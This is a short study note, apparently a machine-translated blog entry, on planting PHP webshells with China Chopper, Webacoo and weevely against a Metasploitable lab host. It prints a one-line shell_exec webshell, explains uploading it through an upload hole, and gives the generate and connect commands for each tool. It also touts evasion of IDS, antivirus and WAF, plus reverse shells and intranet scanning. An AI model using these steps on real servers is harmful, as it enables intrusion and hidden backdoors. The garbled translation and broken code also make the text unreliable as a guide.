Small white diary 51:kali penetration test Web penetration-webshell (Chinese kitchen knives, Webacoo, weevely)

Webshell

Essence: <?php echo shell_exec ($_get[' cmd ');? >

Windows platform

Chinese Kitchen Knife official website: Fat client program, domestic in relatively excellent webshell, applicability strong "But the version of a lot of chaos, there may be Trojans, said the official website http://www.maicaidao.co/"

1, the use of upload vulnerability, first upload a sentence trojan "support three kinds of server-side PHP, ASP," ASP.

Connect metasploitable using SSH

Create a file that contains a Trojan code

2, connect the appropriate server side

Add server-side URL "password as a word in the Trojan parameters"

Double click to enter the file management interface

You can also enter the command line mode "Virtual Terminal" {Permissions only for Web program run permissions}

may be detected by IDs, AV, WAF, scanner software "can be encoded to kill"

Kali platform under the Webshell, essentially similar to Chinese kitchen knives, has the encoding function, can avoid being Avira

Webacoo(Web backdoor Cookie) "PHP only"

Gets the shell of the class terminal

Encoded communication content through the cookie head transmission, strong concealment

Parameters:

CM:BASE64 encoded commands

CN: The name of the cookie header used by the server to return data

CP: Return information delimiter

1. Generate server-side

Wenacoo-g-O a.php

# # Server root directory uploaded to Metaspolitable using SCP

Move webacoo.php to the Web root directory

2. Connect using the Client

WEBACOO-T-U http://1.1.1.1/a.php

# #抓包分析如何通过cookie头传指令, manually trigger traffic "CM/CN/CP"

Other parameters

Webacoo-h

weevely　　"Using HTTP headers for instruction (encoded) transmission"

Hidden class terminal PHP Webshell

There are more than 30 management modules

Execute system commands, browse file system

Check server Common configuration errors

To create a forward, reverse TCP shell connection

Proxy HTTP traffic through the target computer

Run port scan from Target computer, infiltrate intranet

Support Connection Password

*****************************************************************

# #kali中缺少库

https://pypi.python.org/pypi/PySocks/"Download library file Compression Package"

./setup.py Install

****************************************************************************************

1, generate the service side "to generate a coded Trojan"

weevely Generate <password> <path>

# #上传木马

2. Connecting clients

weevely <URL> <password> [cmd]

3. Module

Help

Small white diary 51:kali penetration test Web penetration-webshell (Chinese chopper, WEBACOO, weevely)